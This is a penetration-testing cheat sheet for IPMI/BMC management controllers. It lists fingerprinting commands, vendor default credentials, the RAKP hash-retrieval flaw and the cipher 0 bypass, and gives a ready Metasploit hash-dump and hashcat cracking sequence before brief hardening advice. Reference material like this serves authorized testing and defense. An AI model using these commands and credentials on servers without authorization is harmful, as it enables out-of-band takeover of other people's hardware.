IPMI
aka BMC, iDRAC, iLO, Supermicro IPMI
Baseboard management (BMC) on 623/udp. A protocol design flaw lets you retrieve a password hash for offline cracking, and BMC default creds grant out-of-band server control.
Ports
| Port | Proto | Notes |
|---|---|---|
623 | udp | IPMI / RMCP |
Fingerprint
- nmap -sU -p623 --script ipmi-version
- Metasploit scanner/ipmi/ipmi_version
Default / weak creds
ADMIN / ADMIN (Supermicro), root / calvin (Dell iDRAC), admin / admin (generic)
Known CVEs
| CVE | Impact |
|---|---|
| IPMI 2.0 RAKP | Protocol flaw: the server returns a crackable HMAC of the user's password hash |
| Cipher 0 | Authentication bypass when cipher suite 0 is enabled |
Exploitation primitives
- Metasploit ipmi_dumphashes retrieves RAKP HMACs, crack them with hashcat mode 7300
- Cipher 0 lets you run commands with any password
- Default BMC credentials give full out-of-band control (KVM, power, virtual media)
Overview
IPMI is the management processor baked into server hardware. It sits beside the OS, so a BMC compromise is effectively physical access. The RAKP flaw makes hash retrieval almost free.
Hash dump and crack
msfconsole -q -x "use auxiliary/scanner/ipmi/ipmi_dumphashes; set RHOSTS <TARGET>; run; exit"
hashcat -m 7300 ipmi.hash rockyou.txtHardening
Isolate BMCs on a management VLAN, change default creds, disable cipher 0, and patch firmware.